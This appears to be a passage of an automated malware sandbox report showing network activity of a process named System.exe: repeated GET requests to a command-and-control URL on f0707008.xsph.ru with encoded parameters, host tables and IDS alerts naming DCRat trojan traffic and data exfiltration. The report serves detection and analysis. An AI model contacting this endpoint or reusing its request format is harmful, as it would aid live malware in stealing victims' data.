1284 | System.exe | GET | — | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&e15ac3c90300a65a7efb4543f78b520e=QX9JSUNJiOigjYjBDNykzM2QmNjRGMlRjZxUTOzETM5UDZzM2YkRGOiwiIlNjZyMGN2Q2YiZGZ3QGM2MjYmJWZ4MzN0YmMkJ2YmFjY4MWN2QGNiJiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W | RU | — | — | malicious |
1284 | System.exe | GET | 200 | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&e15ac3c90300a65a7efb4543f78b520e=QX9JSUNJiOigjYjBDNykzM2QmNjRGMlRjZxUTOzETM5UDZzM2YkRGOiwiIlNjZyMGN2Q2YiZGZ3QGM2MjYmJWZ4MzN0YmMkJ2YmFjY4MWN2QGNiJiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W | RU | text | 696 b | malicious |
1284 | System.exe | GET | 200 | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&e15ac3c90300a65a7efb4543f78b520e=0VfisWaRxkQp5UM0MUTyc2QJJTUU5keZpWT3RzQNd3bE10dvRUT3FUaPxWMXFGMCNkWs5ESjhGeXJ1ZFNlW1lzRSJiOigjYjBDNykzM2QmNjRGMlRjZxUTOzETM5UDZzM2YkRGOiwiIhFGNlhzN4IDN1ATZhhzY1gDOkRGZ4MzMyEzNwIWYiFGMiJjZxEDZwIiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W | RU | text | 696 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 141.8.193.236:80 | f0707008.xsph.ru | Sprinthost.ru LLC | RU | malicious |
1284 | System.exe | 141.8.193.236:80 | f0707008.xsph.ru | Sprinthost.ru LLC | RU | malicious |
Domain | IP | Reputation |
---|---|---|
f0707008.xsph.ru |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
1284 | System.exe | A Network Trojan was detected | ET TROJAN DCRAT Activity (GET) |
1284 | System.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
1284 | System.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
1284 | System.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
1284 | System.exe | A Network Trojan was detected | ET TROJAN Win32/DCRat CnC Exfil |
1284 | System.exe | A Network Trojan was detected | ET INFO Observed Malicious Filename in Outbound POST Request (Information.txt) |
1284 | System.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |
1284 | System.exe | A Network Trojan was detected | ET TROJAN Win32/DCRat CnC Exfil |
1284 | System.exe | A Network Trojan was detected | ET INFO Observed Malicious Filename in Outbound POST Request (Information.txt) |
1284 | System.exe | Potentially Bad Traffic | ET INFO Observed POST to xsph .ru Domain |